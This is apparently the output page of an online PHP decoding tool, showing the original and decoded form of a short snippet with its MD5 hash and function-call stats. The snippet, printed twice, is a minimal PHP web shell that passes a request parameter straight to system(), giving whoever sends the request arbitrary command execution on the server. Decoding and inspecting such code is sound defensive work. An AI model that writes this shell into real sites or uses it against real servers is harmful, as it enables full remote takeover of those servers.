Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_REQUEST[1])){ echo "<pre>"; $cmd = ($_REQUEST[1]); system($cmd); echo "<p..

Decoded Output download

<?php if(isset($_REQUEST[1])){ echo "<pre>"; $cmd = ($_REQUEST[1]); system($cmd); echo "<pre>"; die;}?>

Did this file decode correctly?

Original Code

<?php if(isset($_REQUEST[1])){ echo "<pre>"; $cmd = ($_REQUEST[1]); system($cmd); echo "<pre>"; die;}?>

Function Calls

system 1

Variables

$cmd None

Stats

MD5 4d8832145f437d4c7f69b538f9d94d42
Eval Count 0
Decode Time 51 ms